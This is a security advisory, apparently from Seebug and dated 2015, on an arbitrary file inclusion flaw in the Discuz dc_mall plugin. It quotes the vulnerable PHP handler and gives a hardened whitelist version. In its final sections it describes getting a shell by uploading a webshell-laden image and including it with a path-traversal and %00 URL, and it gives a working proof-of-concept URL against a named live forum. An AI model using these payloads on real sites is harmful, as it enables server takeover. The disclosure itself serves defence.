Design flaw in a Discuz plugin allows front-end getshell (with fairly strong preconditions)

2015-08-04T00:00:00
ID SSV:93754
Type seebug
Reporter Root
Modified 2015-08-04T00:00:00

Description

Brief description:

Design flaw

Details:

Arbitrary file inclusion in the Discuz credit mall plugin (dc_mall), tested on the latest version

Plugin information:

http://addon.discuz.com/?@dc_mall.plugin, official install count 3000+ (not a small number)

[Screenshot 图片1.png: https://images.seebug.org/upload/201508/0319354340be9f11eca155416f7a12dd4be5be01.png]

[Screenshot 图片4.png: https://images.seebug.org/upload/201508/03193843ff7c8ede2715b4f8f168ef2c7f1630d1.png]

Search by keyword:

Took me half a day to get the cloud platform service working... finally able to install plugins...

Test environment:

PHP version: 5.2.9-2, magic_quotes_gpc = off

Let's look at the code first:

dc_mall.inc.php (vulnerable file)

```php
<?php
if(!defined('IN_DISCUZ')) {
    exit('Access Denied');
}
$_lang = lang('plugin/dc_mall');
$action = $_GET['action'] ? $_GET['action'] : 'index';
$version = 'Ver 1.1.1';
$cvar = $_G['cache']['plugin']['dc_mall'];
// The action parameter is passed into $file unfiltered; appending %00 truncates
// the path (PHP 5.2), so an arbitrary file can be included.
$file = DISCUZ_ROOT.'./source/plugin/dc_mall/module/index/'.$action.'.inc.php';
if (!file_exists($file) || !$cvar['open']) showmessage('undefined_action');
$usercredit = getuserprofile('extcredits'.$cvar['credit']);
$mallnav = C::t('#dc_mall#dc_mall_sort')->getdata();
$sortid = dintval($_GET['sortid']);
if(empty($mallnav[$sortid])) $sortid = 0;
@include $file;
$croppath = DISCUZ_ROOT.'./source/plugin/dc_mall/data/cron.php';
$cronupdate = @include $croppath;
if(TIMESTAMP - $cronupdate['timestamp'] > $cvar['autotime'] * 60) {
    require_once DISCUZ_ROOT.'./source/plugin/dc_mall/cache/cache_mallinfo.php';
    build_cache_plugin_mallinfo();
    $configdata = 'return '.var_export(array('timestamp' => TIMESTAMP), true).";\n\n";
    if($fp = @fopen($croppath, 'wb')) {
        fwrite($fp, "<?php\n//plugin mall temp upgrade check file, DO NOT modify me!\n//Identify: ".md5($configdata)."\n\n$configdata?>");
        fclose($fp);
    }
}
include template('dc_mall:index/'.$action);
?>
```
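A hardened replacement for the action-to-path step, written here as an added example rather than the plugin's or Discuz's own code; the list of allowed action names is an assumption, and `DISCUZ_ROOT` and `showmessage()` are assumed to behave as in Discuz:

```php
<?php
// Added hardening example (not the plugin's code). The original handler builds an
// include path straight from $_GET['action'], so "../" and a NUL byte (%00, which
// PHP before 5.3.4 treats as end of path) let the request choose the file.

// Hypothetical whitelist: the only module files this handler may ever include.
$allowed_actions = array('index', 'list', 'view');

function dc_mall_resolve_action($action, $allowed)
{
    // 1. Default to 'index' when the parameter is absent, as the original does.
    if ($action === null || $action === '') {
        $action = 'index';
    }
    // 2. Accept only a plain identifier: this rejects "/", ".", and NUL bytes.
    if (!preg_match('/^[a-zA-Z0-9_]+$/', $action)) {
        return false;
    }
    // 3. Compare against the whitelist by exact name instead of trusting
    //    file_exists() on an attacker-shaped path.
    if (!in_array($action, $allowed, true)) {
        return false;
    }
    // 4. Resolve the final path and confirm it is still inside the module directory.
    $base = realpath(DISCUZ_ROOT . './source/plugin/dc_mall/module/index');
    $file = ($base === false) ? false : realpath($base . '/' . $action . '.inc.php');
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $file;
}

$file = dc_mall_resolve_action(isset($_GET['action']) ? $_GET['action'] : '',
                               $allowed_actions);
if ($file === false) {
    showmessage('undefined_action');
}
@include $file;
// The later template('dc_mall:index/'.$action) call should use the same validated
// $action, so the template lookup cannot be steered by the raw parameter either.
```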

Inclusion test

[Screenshot 图片2.png: https://images.seebug.org/upload/201508/031936395bfde0824b37810666dde38f70794f85.png]

getshell

Getting a shell needs little explanation: upload an image containing a webshell through the front end, then include it directly: www.xxx.com/plugin.php?action=../../../../../data/attachment/forum/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall

[Screenshot 图片3.png: https://images.seebug.org/upload/201508/03193700768ff9afe86e04b8f19d23a9ada50c4a.png]

Proof of vulnerability:

http://bbs.medkaoyan.net/plugin.php?action=../../../../../robots.txt%00&id=dc_mall